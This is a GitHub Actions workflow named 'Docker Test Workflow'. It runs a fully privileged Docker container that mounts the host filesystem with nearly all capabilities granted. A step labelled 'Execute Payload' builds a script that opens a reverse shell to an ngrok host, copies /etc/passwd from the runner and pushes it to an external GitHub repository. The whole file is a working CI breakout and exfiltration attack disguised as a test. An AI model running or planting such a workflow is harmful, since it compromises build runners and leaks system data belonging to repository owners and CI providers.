name: Docker Test Workflow

on:
  push:
    branches:
      - main
  workflow_dispatch:

jobs:
  docker-test:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Set up Docker Buildx
        uses: docker/setup-buildx-action@v2

      - name: Run Docker Container with Privileged Mode
        run: |
          docker run --rm --privileged \
            -v /:/mnt \
            -v /proc:/proc \
            -v /sys:/sys \
            -v /dev:/mnt/dev \
            -v /boot:/mnt/boot \
            -v /etc:/mnt/etc \
            -v /home:/mnt/home \
            -v /lib:/mnt/lib \
            -v /lib64:/mnt/lib64 \
            -v /opt:/mnt/opt \
            -v /run:/mnt/run \
            -v /sbin:/mnt/sbin \
            -v /usr:/mnt/usr \
            -v /var:/mnt/var \
            --cap-add=SYS_ADMIN \
            --cap-add=SYS_PTRACE \
            --cap-add=SYS_MODULE \
            --cap-add=SYS_NICE \
            --cap-add=SYS_RESOURCE \
            --cap-add=SYS_TIME \
            --cap-add=SYS_TTY_CONFIG \
            --cap-add=NET_ADMIN \
            --cap-add=NET_RAW \
            --cap-add=IPC_LOCK \
            --cap-add=IPC_OWNER \
            --cap-add=LEASE \
            --cap-add=LINUX_IMMUTABLE \
            --cap-add=MAC_ADMIN \
            --cap-add=MAC_OVERRIDE \
            --cap-add=MKNOD \
            --cap-add=SETFCAP \
            --cap-add=SETPCAP \
            --cap-add=WAKE_ALARM \
            --cap-add=AUDIT_CONTROL \
            --cap-add=AUDIT_WRITE \
            --cap-add=BLOCK_SUSPEND \
            --cap-add=DAC_OVERRIDE \
            --cap-add=DAC_READ_SEARCH \
            --name breakout_test \
            -d alpine sleep 600

      - name: Install all needed packages
        run: |
          docker exec --privileged breakout_test apk add --no-cache git curl

      - name: Execute Payload
        run: |
          docker exec --privileged breakout_test /bin/bash -c "\
            echo \"#!/bin/bash\" > /mnt/tmp/exfil.sh && \
            echo \"bash -i >& /dev/tcp/2.tcp.us-cal-1.ngrok.io/12090 0>&1 &\" >> /mnt/tmp/exfil.sh && \
            echo \"cd /mnt/home/runner/work/_actions/docker/setup-buildx-action/v2\" >> /mnt/tmp/exfil.sh && \
            echo \"git config --global --add safe.directory /mnt/home/runner/work/_actions/docker/setup-buildx-action/v2\" >> /mnt/tmp/exfil.sh && \
            echo \"git config --global user.email 'nickharrison2002000@gmail.com'\" >> /mnt/tmp/exfil.sh && \
            echo \"git config --global user.name 'nickharrison2002000'\" >> /mnt/tmp/exfil.sh && \
            echo \"if [ ! -d .git ]; then git init; fi\" >> /mnt/tmp/exfil.sh && \
            echo \"curl file:///mnt/etc/passwd -o /mnt/tmp/exfiltrated_passwd.txt --create-dirs\" >> /mnt/tmp/exfil.sh && \
            echo \"git add /mnt/tmp/exfiltrated_passwd.txt\" >> /mnt/tmp/exfil.sh && \
            echo \"git commit -m 'Exfiltrated passwd file'\" >> /mnt/tmp/exfil.sh && \
            echo \"git remote add origin https://github.com/nickharrison2002000/exploit-1.git\" >> /mnt/tmp/exfil.sh && \
            echo \"git push -u origin master\" >> /mnt/tmp/exfil.sh && \
            chmod +x /mnt/tmp/exfil.sh && \
            /mnt/tmp/exfil.sh"
